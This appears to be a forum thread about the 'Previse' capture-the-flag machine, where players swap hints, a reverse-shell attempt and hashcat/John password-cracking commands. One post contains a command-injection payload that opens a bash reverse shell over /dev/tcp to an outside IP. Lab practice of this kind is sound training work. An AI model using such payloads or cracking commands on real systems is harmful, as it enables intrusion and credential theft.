Official Previse Discussion

Ok, I finally got it… Machine is shared and someone (some of you guys!) is playing around with the webapp’s credentials. Bruteforcing the login page wasn’t the real way inside.
Please guys, don’t do this as you are ruining the experience for others…

Cannot get a reverse shell for my life- I’m trying by modifying the delim to delim= comma%26/bin/bash±c+‘bash±i+>/dev/tcp/10.10.14.9/6666+0>%261’

The shell says connect to but it immediately closes. Help or suggestions?

Having an issue with getting a foothold. I was able to see some interesting things using B*** but not understanding where to go from here. File upload seems to be a dead end and unable to get the .zip file to download. I have an idea on what to do but unsure on how to go about it if it is even the correct path. Feel free to DM

UPDATE: I got it figured out. Got user and Root. Fun box and a great one to knock the rust off with!

Still having problems getting a foothold. Use bp and found a*******.p
Not sure how to interact with that though. Tried the post but no success yet.
I’d appreciate a nudge :slight_smile:

I am getting completely different hashcat results, even though I have used exactly the same methods as every one of the walkthroughs I’ve read. I have tried:-

sudo hashcat -a 0 -m 500 ‘$1$xxxxxxxxxxxxxxxx’ /usr/share/wordlists/rockyou.txt [which gives me a password that is one digit out at the end??]

sudo hashcat -m 500 ./hash.txt /usr/share/wordlists/rockyou.txt [Gives me hex results that are incorrect when decoded]

and

sudo hashcat -a 0 -m 500 ./hash.txt -O --outfile-autohex-disable /usr/share/wordlists/rockyou.txt [Gives me hex results that are incorrect when decoded]

and even

sudo hashcat -m 500 ./hash.txt -O --outfile-autohex-disable /usr/share/wordlists/rockyou.txt [Which gives the same results]

I have tried copying the hash in various different ways, pasting and echoing into a file.

What am I doing wrong??

Thanks for reminding me about this useful flag at John’s.
I tested both crackers, John breaks the hash 2 minutes faster.

hashcat
Started: Thu May 16 19:58:00 2024
Stopped: Thu May 16 20:05:31 2024

jtr
1g 0:00:05:08 DONE (2024-05-16 20:15)